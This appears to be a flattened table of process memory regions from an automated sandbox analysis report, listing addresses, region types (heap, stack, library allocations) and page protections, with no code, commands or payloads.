|
||
|
7865000
|
unkown
|
page read and write
|
||
|
9A10000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
906E000
|
stack
|
page read and write
|
||
|
1D666A2E000
|
heap
|
page read and write
|
||
|
A37D000
|
unkown
|
page read and write
|
||
|
A3D2000
|
unkown
|
page read and write
|
||
|
C24367F000
|
stack
|
page read and write
|
||
|
7FF5ED6A5000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED4DF000
|
unkown
|
page readonly
|
||
|
37D2000
|
unkown
|
page read and write
|
||
|
7FF5ED5F7000
|
unkown
|
page readonly
|
||
|
7FF5ED980000
|
unkown
|
page readonly
|
||
|
5422000
|
direct allocation
|
page execute and read and write
|
||
|
7FF5ED46A000
|
unkown
|
page readonly
|
||
|
7FF5ED519000
|
unkown
|
page readonly
|
||
|
7FF5ECED2000
|
unkown
|
page readonly
|
||
|
C6D8000
|
unkown
|
page read and write
|
||
|
7FF5ED8B4000
|
unkown
|
page readonly
|
||
|
1D664E8D000
|
heap
|
page read and write
|
||
|
C57F000
|
unkown
|
page read and write
|
||
|
B650000
|
unkown
|
page read and write
|
||
|
C2438B7000
|
stack
|
page read and write
|
||
|
7FF5ED4C6000
|
unkown
|
page readonly
|
||
|
7FF5ED8C6000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FF5ED42B000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
1DC40506000
|
trusted library allocation
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED2A9000
|
unkown
|
page readonly
|
||
|
1D667353000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D666A2B000
|
heap
|
page read and write
|
||
|
1DC3E210000
|
heap
|
page read and write
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
F4EB000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED4C2000
|
unkown
|
page readonly
|
||
|
35D0000
|
unkown
|
page read and write
|
||
|
7FF5ED77C000
|
unkown
|
page readonly
|
||
|
B419000
|
system
|
page execute and read and write
|
||
|
1D667337000
|
heap
|
page read and write
|
||
|
32F6000
|
heap
|
page read and write
|
||
|
4E80000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
4B93000
|
unkown
|
page read and write
|
||
|
B8C0000
|
unkown
|
page readonly
|
||
|
520D000
|
direct allocation
|
page execute and read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED3CE000
|
unkown
|
page readonly
|
||
|
9885000
|
unkown
|
page read and write
|
||
|
1D664E8D000
|
heap
|
page read and write
|
||
|
1D664BF0000
|
heap
|
page read and write
|
||
|
1D66730B000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
68EF000
|
stack
|
page read and write
|
||
|
7E50000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
17F0000
|
heap
|
page read and write
|
||
|
CA02000
|
unkown
|
page read and write
|
||
|
C57F000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D6672A0000
|
heap
|
page read and write
|
||
|
C0305FE000
|
stack
|
page read and write
|
||
|
1200000
|
unkown
|
page readonly
|
||
|
E69F000
|
stack
|
page read and write
|
||
|
1D6672AA000
|
heap
|
page read and write
|
||
|
4B8B000
|
unkown
|
page read and write
|
||
|
1240000
|
heap
|
page read and write
|
||
|
542827E000
|
stack
|
page read and write
|
||
|
7852000
|
unkown
|
page read and write
|
||
|
1114F000
|
system
|
page read and write
|
||
|
7FF5EDA0D000
|
unkown
|
page readonly
|
||
|
1D667690000
|
heap
|
page read and write
|
||
|
F579000
|
unkown
|
page read and write
|
||
|
7FF5ED872000
|
unkown
|
page readonly
|
||
|
7FF5EDA0B000
|
unkown
|
page readonly
|
||
|
7FF5ED516000
|
unkown
|
page readonly
|
||
|
7FF5ED507000
|
unkown
|
page readonly
|
||
|
896B000
|
stack
|
page read and write
|
||
|
3795000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4FC0000
|
trusted library allocation
|
page read and write
|
||
|
1D6669E9000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FF5ED803000
|
unkown
|
page readonly
|
||
|
8000000
|
unkown
|
page read and write
|
||
|
1D667337000
|
heap
|
page read and write
|
||
|
1DC3E310000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
37AC000
|
unkown
|
page read and write
|
||
|
BAF9000
|
stack
|
page read and write
|
||
|
8A6E000
|
stack
|
page read and write
|
||
|
290D67D0000
|
system
|
page execute and read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
C4A0000
|
unkown
|
page read and write
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
7FF5ED956000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D6669DE000
|
heap
|
page read and write
|
||
|
7FF5ED7DB000
|
unkown
|
page readonly
|
||
|
7FF5ED800000
|
unkown
|
page readonly
|
||
|
3240000
|
unkown
|
page read and write
|
||
|
1DC3FFDF000
|
trusted library allocation
|
page read and write
|
||
|
1D6669D0000
|
heap
|
page read and write
|
||
|
986B000
|
unkown
|
page read and write
|
||
|
787C000
|
unkown
|
page read and write
|
||
|
9881000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D664CB5000
|
heap
|
page read and write
|
||
|
56C3000
|
unkown
|
page read and write
|
||
|
286C000
|
heap
|
page read and write
|
||
|
B22B000
|
stack
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
C89C000
|
unkown
|
page read and write
|
||
|
C52C000
|
unkown
|
page read and write
|
||
|
C24468D000
|
stack
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
1D667496000
|
heap
|
page read and write
|
||
|
7D53000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED3F3000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
B417000
|
system
|
page execute and read and write
|
||
|
965C000
|
stack
|
page read and write
|
||
|
7FF5ED7D6000
|
unkown
|
page readonly
|
||
|
68AE000
|
stack
|
page read and write
|
||
|
AADB000
|
unkown
|
page read and write
|
||
|
7CD0000
|
unkown
|
page read and write
|
||
|
CB20000
|
unkown
|
page read and write
|
||
|
1DC3E0D0000
|
heap
|
page read and write
|
||
|
5066000
|
heap
|
page read and write
|
||
|
1D664CED000
|
heap
|
page read and write
|
||
|
3758000
|
unkown
|
page read and write
|
||
|
7FF5ED5A8000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
978E000
|
unkown
|
page read and write
|
||
|
ED0000
|
unclassified section
|
page execute and read and write
|
||
|
4C4B000
|
unkown
|
page read and write
|
||
|
314F000
|
unkown
|
page read and write
|
||
|
7FF5ED73D000
|
unkown
|
page readonly
|
||
|
7852000
|
unkown
|
page read and write
|
||
|
1D6672BA000
|
heap
|
page read and write
|
||
|
9881000
|
unkown
|
page read and write
|
||
|
7DF4F3030000
|
unkown
|
page readonly
|
||
|
1D664CB3000
|
heap
|
page read and write
|
||
|
1D664E88000
|
heap
|
page read and write
|
||
|
29F05B63000
|
trusted library allocation
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
C6E3000
|
unkown
|
page read and write
|
||
|
9875000
|
unkown
|
page read and write
|
||
|
7FF5ED65C000
|
unkown
|
page readonly
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED5C9000
|
unkown
|
page readonly
|
||
|
26D0000
|
direct allocation
|
page read and write
|
||
|
7CA0000
|
unkown
|
page read and write
|
||
|
29F03A7F000
|
heap
|
page read and write
|
||
|
29F094D9000
|
trusted library allocation
|
page read and write
|
||
|
FBE6000
|
unkown
|
page read and write
|
||
|
7FF5ED806000
|
unkown
|
page readonly
|
||
|
1D666A2B000
|
heap
|
page read and write
|
||
|
89E0000
|
unkown
|
page read and write
|
||
|
7FF5ED503000
|
unkown
|
page readonly
|
||
|
787C000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
C50A000
|
unkown
|
page read and write
|
||
|
9138000
|
stack
|
page read and write
|
||
|
4CC0000
|
unkown
|
page read and write
|
||
|
A39B000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
32EF000
|
heap
|
page read and write
|
||
|
7FFD9B7C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF5ED64F000
|
unkown
|
page readonly
|
||
|
5427DEE000
|
stack
|
page read and write
|
||
|
8210000
|
unkown
|
page read and write
|
||
|
1DC400D6000
|
trusted library allocation
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
C962000
|
unkown
|
page read and write
|
||
|
4BA6000
|
unkown
|
page read and write
|
||
|
87F0000
|
heap
|
page read and write
|
||
|
7859000
|
unkown
|
page read and write
|
||
|
7FF5ED986000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
7FF5ED5C1000
|
unkown
|
page readonly
|
||
|
26D5000
|
direct allocation
|
page read and write
|
||
|
29F0947C000
|
trusted library allocation
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED849000
|
unkown
|
page readonly
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
32F6000
|
heap
|
page read and write
|
||
|
7FF5ED928000
|
unkown
|
page readonly
|
||
|
6202000
|
heap
|
page read and write
|
||
|
6220000
|
trusted library allocation
|
page read and write
|
||
|
A3BE000
|
unkown
|
page read and write
|
||
|
7FF5ED674000
|
unkown
|
page readonly
|
||
|
3210000
|
unkown
|
page read and write
|
||
|
29F0C53D000
|
trusted library allocation
|
page read and write
|
||
|
32EB000
|
heap
|
page read and write
|
||
|
26E0000
|
direct allocation
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D666B80000
|
remote allocation
|
page read and write
|
||
|
C6C9000
|
unkown
|
page read and write
|
||
|
7863000
|
unkown
|
page read and write
|
||
|
37F9000
|
unkown
|
page read and write
|
||
|
C2431D3000
|
stack
|
page read and write
|
||
|
9893000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
507E000
|
stack
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
C2434FE000
|
stack
|
page read and write
|
||
|
7FF5ED4B4000
|
unkown
|
page readonly
|
||
|
1D666A2D000
|
heap
|
page read and write
|
||
|
35D0000
|
unkown
|
page read and write
|
||
|
35D7000
|
heap
|
page read and write
|
||
|
91B9000
|
stack
|
page read and write
|
||
|
7FF5ED1D8000
|
unkown
|
page readonly
|
||
|
1DC3E138000
|
heap
|
page read and write
|
||
|
7FF5ED92C000
|
unkown
|
page readonly
|
||
|
1DC4FFC1000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED43A000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D6676A1000
|
heap
|
page read and write
|
||
|
CA42000
|
unkown
|
page read and write
|
||
|
1D6672DD000
|
heap
|
page read and write
|
||
|
54285FE000
|
stack
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D667309000
|
heap
|
page read and write
|
||
|
AF8D000
|
stack
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED602000
|
unkown
|
page readonly
|
||
|
3756000
|
unkown
|
page read and write
|
||
|
1D666A5F000
|
heap
|
page read and write
|
||
|
C700000
|
unkown
|
page read and write
|
||
|
DE0000
|
unkown
|
page readonly
|
||
|
1D666B30000
|
heap
|
page read and write
|
||
|
7FF5ED695000
|
unkown
|
page readonly
|
||
|
C24393C000
|
stack
|
page read and write
|
||
|
C6CF000
|
unkown
|
page read and write
|
||
|
7FFD9B6E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF5ED9CC000
|
unkown
|
page readonly
|
||
|
943A000
|
stack
|
page read and write
|
||
|
1D6669D8000
|
heap
|
page read and write
|
||
|
1616000
|
direct allocation
|
page execute and read and write
|
||
|
1D666A2E000
|
heap
|
page read and write
|
||
|
1D666A27000
|
heap
|
page read and write
|
||
|
7FF5EDA76000
|
unkown
|
page readonly
|
||
|
FBE0000
|
unkown
|
page read and write
|
||
|
785F000
|
unkown
|
page read and write
|
||
|
1D66752C000
|
heap
|
page read and write
|
||
|
1D664C2E000
|
heap
|
page read and write
|
||
|
1D666A23000
|
heap
|
page read and write
|
||
|
BDA0000
|
unkown
|
page readonly
|
||
|
C2435FD000
|
stack
|
page read and write
|
||
|
1440000
|
unkown
|
page read and write
|
||
|
C24357E000
|
stack
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
C6E3000
|
unkown
|
page read and write
|
||
|
1D66734C000
|
heap
|
page read and write
|
||
|
1500000
|
heap
|
page read and write
|
||
|
7FF5ED39E000
|
unkown
|
page readonly
|
||
|
987F000
|
unkown
|
page read and write
|
||
|
50D7000
|
heap
|
page read and write
|
||
|
C893000
|
unkown
|
page read and write
|
||
|
314F000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FF5ED781000
|
unkown
|
page readonly
|
||
|
2700000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
9ADA000
|
stack
|
page read and write
|
||
|
A361000
|
unkown
|
page read and write
|
||
|
7863000
|
unkown
|
page read and write
|
||
|
3290000
|
unkown
|
page read and write
|
||
|
29F03A7A000
|
heap
|
page read and write
|
||
|
A502000
|
unkown
|
page read and write
|
||
|
2EBB000
|
stack
|
page read and write
|
||
|
7857000
|
unkown
|
page read and write
|
||
|
3209000
|
stack
|
page read and write
|
||
|
C243A3E000
|
stack
|
page read and write
|
||
|
C2437F9000
|
stack
|
page read and write
|
||
|
9871000
|
unkown
|
page read and write
|
||
|
76C0000
|
unkown
|
page read and write
|
||
|
1D664CDB000
|
heap
|
page read and write
|
||
|
1D66730B000
|
heap
|
page read and write
|
||
|
1DC58422000
|
heap
|
page read and write
|
||
|
1D6674EA000
|
heap
|
page read and write
|
||
|
7FF5ED74A000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
B7AD000
|
stack
|
page read and write
|
||
|
7FF5ED404000
|
unkown
|
page readonly
|
||
|
7DF4F4980000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF5ED9C6000
|
unkown
|
page readonly
|
||
|
4BC9000
|
unkown
|
page read and write
|
||
|
1D664C71000
|
heap
|
page read and write
|
||
|
7FF5ED516000
|
unkown
|
page readonly
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
C516000
|
unkown
|
page read and write
|
||
|
7FF5ED81B000
|
unkown
|
page readonly
|
||
|
1D666A2B000
|
heap
|
page read and write
|
||
|
36D5000
|
stack
|
page read and write
|
||
|
7FF5ED91A000
|
unkown
|
page readonly
|
||
|
1D667662000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
147D000
|
direct allocation
|
page execute and read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
C846000
|
unkown
|
page read and write
|
||
|
978E000
|
unkown
|
page read and write
|
||
|
1D666DF0000
|
heap
|
page read and write
|
||
|
37A8000
|
unkown
|
page read and write
|
||
|
7FF5ED59E000
|
unkown
|
page readonly
|
||
|
308A000
|
stack
|
page read and write
|
||
|
7FF5ED1BC000
|
unkown
|
page readonly
|
||
|
CB1D000
|
unkown
|
page read and write
|
||
|
3700000
|
unkown
|
page read and write
|
||
|
1440000
|
unkown
|
page read and write
|
||
|
1DC400ED000
|
trusted library allocation
|
page read and write
|
||
|
161D000
|
direct allocation
|
page execute and read and write
|
||
|
7DF4F3031000
|
unkown
|
page execute read
|
||
|
F424000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
F562000
|
unkown
|
page read and write
|
||
|
78AD000
|
unkown
|
page read and write
|
||
|
1D666A2B000
|
heap
|
page read and write
|
||
|
7FFD9B8C2000
|
trusted library allocation
|
page read and write
|
||
|
1DC3E040000
|
heap
|
page read and write
|
||
|
1D66752A000
|
heap
|
page read and write
|
||
|
1DC406CC000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED814000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1DC3E230000
|
heap
|
page read and write
|
||
|
C893000
|
unkown
|
page read and write
|
||
|
7FF5ED5EB000
|
unkown
|
page readonly
|
||
|
1D664CB3000
|
heap
|
page read and write
|
||
|
9795000
|
unkown
|
page read and write
|
||
|
1D66755E000
|
heap
|
page read and write
|
||
|
5641000
|
unkown
|
page read and write
|
||
|
698F000
|
stack
|
page read and write
|
||
|
339C000
|
heap
|
page read and write
|
||
|
E8F000
|
unclassified section
|
page execute and read and write
|
||
|
12F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF5ED779000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
62B0000
|
heap
|
page read and write
|
||
|
A11F000
|
stack
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
29F0543A000
|
heap
|
page read and write
|
||
|
1D667260000
|
heap
|
page read and write
|
||
|
A479000
|
unkown
|
page read and write
|
||
|
9138000
|
stack
|
page read and write
|
||
|
7FF5ED73D000
|
unkown
|
page readonly
|
||
|
CA63000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7DF4F3040000
|
unkown
|
page readonly
|
||
|
7FFE000
|
stack
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4F31000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF5ED9ED000
|
unkown
|
page readonly
|
||
|
7FF5ED7DB000
|
unkown
|
page readonly
|
||
|
1DC3FEB0000
|
heap
|
page read and write
|
||
|
4BE1000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D667264000
|
heap
|
page read and write
|
||
|
C811000
|
unkown
|
page read and write
|
||
|
7FF5ED86B000
|
unkown
|
page readonly
|
||
|
7FF5ED9D2000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
A32A000
|
unkown
|
page read and write
|
||
|
9877000
|
unkown
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
7695000
|
stack
|
page read and write
|
||
|
6A65000
|
heap
|
page read and write
|
||
|
7978000
|
unkown
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
CA20000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED46E000
|
unkown
|
page readonly
|
||
|
1D664CB5000
|
heap
|
page read and write
|
||
|
7FF5ED750000
|
unkown
|
page readonly
|
||
|
7FF5ED872000
|
unkown
|
page readonly
|
||
|
977A000
|
unkown
|
page read and write
|
||
|
7FF5ED94A000
|
unkown
|
page readonly
|
||
|
7FF5ED5C5000
|
unkown
|
page readonly
|
||
|
7FF5ED9AE000
|
unkown
|
page readonly
|
||
|
E70000
|
unclassified section
|
page execute and read and write
|
||
|
7DF4F3071000
|
unkown
|
page execute read
|
||
|
3385000
|
heap
|
page read and write
|
||
|
C41F000
|
stack
|
page read and write
|
||
|
C2436FE000
|
stack
|
page read and write
|
||
|
7FF5ED9D6000
|
unkown
|
page readonly
|
||
|
A379000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED71B000
|
unkown
|
page readonly
|
||
|
3795000
|
unkown
|
page read and write
|
||
|
343A000
|
heap
|
page read and write
|
||
|
C7C5000
|
unkown
|
page read and write
|
||
|
1DC58302000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED8E2000
|
unkown
|
page readonly
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
923E000
|
stack
|
page read and write
|
||
|
AAD1000
|
unkown
|
page read and write
|
||
|
56D9000
|
unkown
|
page read and write
|
||
|
1D6669D6000
|
heap
|
page read and write
|
||
|
C10A000
|
stack
|
page read and write
|
||
|
1D666E50000
|
heap
|
page read and write
|
||
|
1D666A2D000
|
heap
|
page read and write
|
||
|
AA90000
|
unkown
|
page read and write
|
||
|
29F09486000
|
trusted library allocation
|
page read and write
|
||
|
A4B8000
|
unkown
|
page read and write
|
||
|
C84D000
|
unkown
|
page read and write
|
||
|
7FF5ED93B000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D667327000
|
heap
|
page read and write
|
||
|
1D664CDB000
|
heap
|
page read and write
|
||
|
7FF5ED505000
|
unkown
|
page readonly
|
||
|
7FF5ED7F1000
|
unkown
|
page readonly
|
||
|
1479000
|
direct allocation
|
page execute and read and write
|
||
|
C507000
|
unkown
|
page read and write
|
||
|
7FF5ED556000
|
unkown
|
page readonly
|
||
|
76C0000
|
unkown
|
page read and write
|
||
|
FBA0000
|
unkown
|
page read and write
|
||
|
FBD1000
|
unkown
|
page read and write
|
||
|
FBEC000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED6A5000
|
unkown
|
page readonly
|
||
|
A21E000
|
stack
|
page read and write
|
||
|
69B7000
|
heap
|
page read and write
|
||
|
E8EF000
|
unkown
|
page execute and read and write
|
||
|
33D1000
|
unkown
|
page read and write
|
||
|
7FF5ED850000
|
unkown
|
page readonly
|
||
|
CBA3000
|
unkown
|
page read and write
|
||
|
79FB000
|
unkown
|
page read and write
|
||
|
1D667309000
|
heap
|
page read and write
|
||
|
AAF6000
|
unkown
|
page read and write
|
||
|
7FF5ED48A000
|
unkown
|
page readonly
|
||
|
7FF5ED4FD000
|
unkown
|
page readonly
|
||
|
C563000
|
unkown
|
page read and write
|
||
|
7FF5ED670000
|
unkown
|
page readonly
|
||
|
1DC403CB000
|
trusted library allocation
|
page read and write
|
||
|
AB47000
|
unkown
|
page read and write
|
||
|
7FF5ED714000
|
unkown
|
page readonly
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7978000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
299E000
|
stack
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
29F03A35000
|
heap
|
page read and write
|
||
|
10A66000
|
system
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D666A25000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
3362000
|
heap
|
page read and write
|
||
|
7FF5ED849000
|
unkown
|
page readonly
|
||
|
29F08D63000
|
trusted library allocation
|
page read and write
|
||
|
AB6B000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D666A2B000
|
heap
|
page read and write
|
||
|
1D6674BE000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED1BC000
|
unkown
|
page readonly
|
||
|
69B0000
|
heap
|
page read and write
|
||
|
6210000
|
heap
|
page read and write
|
||
|
1210000
|
unkown
|
page readonly
|
||
|
7FF5ED87D000
|
unkown
|
page readonly
|
||
|
7FF5ED7C4000
|
unkown
|
page readonly
|
||
|
1D6669DA000
|
heap
|
page read and write
|
||
|
C50A000
|
unkown
|
page read and write
|
||
|
29F03A7C000
|
heap
|
page read and write
|
||
|
1DC403ED000
|
trusted library allocation
|
page read and write
|
||
|
1483000
|
heap
|
page read and write
|
||
|
C08A000
|
stack
|
page read and write
|
||
|
29F03A31000
|
heap
|
page read and write
|
||
|
818E000
|
stack
|
page read and write
|
||
|
331E000
|
stack
|
page read and write
|
||
|
C84D000
|
unkown
|
page read and write
|
||
|
5427D23000
|
stack
|
page read and write
|
||
|
1D664E8E000
|
heap
|
page read and write
|
||
|
9815000
|
unkown
|
page read and write
|
||
|
7847000
|
unkown
|
page read and write
|
||
|
1D664C71000
|
heap
|
page read and write
|
||
|
8EC6000
|
unkown
|
page read and write
|
||
|
9A10000
|
unkown
|
page read and write
|
||
|
7FF5ED800000
|
unkown
|
page readonly
|
||
|
8108000
|
stack
|
page read and write
|
||
|
7FF5ED9FF000
|
unkown
|
page readonly
|
||
|
1D6669F6000
|
heap
|
page read and write
|
||
|
1D664C1C000
|
heap
|
page read and write
|
||
|
C2439B8000
|
stack
|
page read and write
|
||
|
A323000
|
unkown
|
page read and write
|
||
|
7FF5ED7E0000
|
unkown
|
page readonly
|
||
|
1D666C00000
|
heap
|
page read and write
|
||
|
7FF5EDA47000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
C4D0000
|
unkown
|
page read and write
|
||
|
7FF5ED8A4000
|
unkown
|
page readonly
|
||
|
7FFD9B6F0000
|
trusted library allocation
|
page read and write
|
||
|
1D6672D8000
|
heap
|
page read and write
|
||
|
1DC400D9000
|
trusted library allocation
|
page read and write
|
||
|
A4AE000
|
unkown
|
page read and write
|
||
|
1D6669FA000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
F56B000
|
unkown
|
page read and write
|
||
|
1D664CB3000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
98A8000
|
unkown
|
page read and write
|
||
|
1D667342000
|
heap
|
page read and write
|
||
|
56C3000
|
unkown
|
page read and write
|
||
|
29F05B5A000
|
trusted library allocation
|
page read and write
|
||
|
29F059A4000
|
trusted library allocation
|
page read and write
|
||
|
1D666B80000
|
remote allocation
|
page read and write
|
||
|
7FF5ED62F000
|
unkown
|
page readonly
|
||
|
C561000
|
unkown
|
page read and write
|
||
|
1230000
|
unkown
|
page read and write
|
||
|
284F000
|
unkown
|
page read and write
|
||
|
7FF5ED697000
|
unkown
|
page readonly
|
||
|
7FF5ED660000
|
unkown
|
page readonly
|
||
|
C88B000
|
unkown
|
page read and write
|
||
|
37B0000
|
unkown
|
page read and write
|
||
|
7FF5ED4A1000
|
unkown
|
page readonly
|
||
|
7FF5ED5C9000
|
unkown
|
page readonly
|
||
|
1DC581E0000
|
heap
|
page execute and read and write
|
||
|
A310000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
C0309FE000
|
stack
|
page read and write
|
||
|
9A5B000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FF5ED8C1000
|
unkown
|
page readonly
|
||
|
7FF5ED996000
|
unkown
|
page readonly
|
||
|
7FF5ED349000
|
unkown
|
page readonly
|
||
|
F4A3000
|
unkown
|
page read and write
|
||
|
979C000
|
unkown
|
page read and write
|
||
|
987D000
|
unkown
|
page read and write
|
||
|
1D664C1B000
|
heap
|
page read and write
|
||
|
1350000
|
unkown
|
page readonly
|
||
|
9792000
|
unkown
|
page read and write
|
||
|
7857000
|
unkown
|
page read and write
|
||
|
7FF5ED6BA000
|
unkown
|
page readonly
|
||
|
1D66726F000
|
heap
|
page read and write
|
||
|
7FF5ED7FD000
|
unkown
|
page readonly
|
||
|
7FF5ED8A4000
|
unkown
|
page readonly
|
||
|
A33E000
|
unkown
|
page read and write
|
||
|
1D664CA4000
|
heap
|
page read and write
|
||
|
7FF5ED8E2000
|
unkown
|
page readonly
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
79FB000
|
unkown
|
page read and write
|
||
|
7FF5ED986000
|
unkown
|
page readonly
|
||
|
9F0000
|
heap
|
page read and write
|
||
|
4B56000
|
unkown
|
page read and write
|
||
|
785D000
|
unkown
|
page read and write
|
||
|
5557000
|
stack
|
page read and write
|
||
|
1DC58220000
|
heap
|
page read and write
|
||
|
7FF5ED5EB000
|
unkown
|
page readonly
|
||
|
9795000
|
unkown
|
page read and write
|
||
|
7FF5ED996000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
BD1D000
|
stack
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
7FF5ED942000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
9883000
|
unkown
|
page read and write
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
A33E000
|
unkown
|
page read and write
|
||
|
C52C000
|
unkown
|
page read and write
|
||
|
A375000
|
unkown
|
page read and write
|
||
|
29F0952A000
|
trusted library allocation
|
page read and write
|
||
|
C6C1000
|
unkown
|
page read and write
|
||
|
1D666A5F000
|
heap
|
page read and write
|
||
|
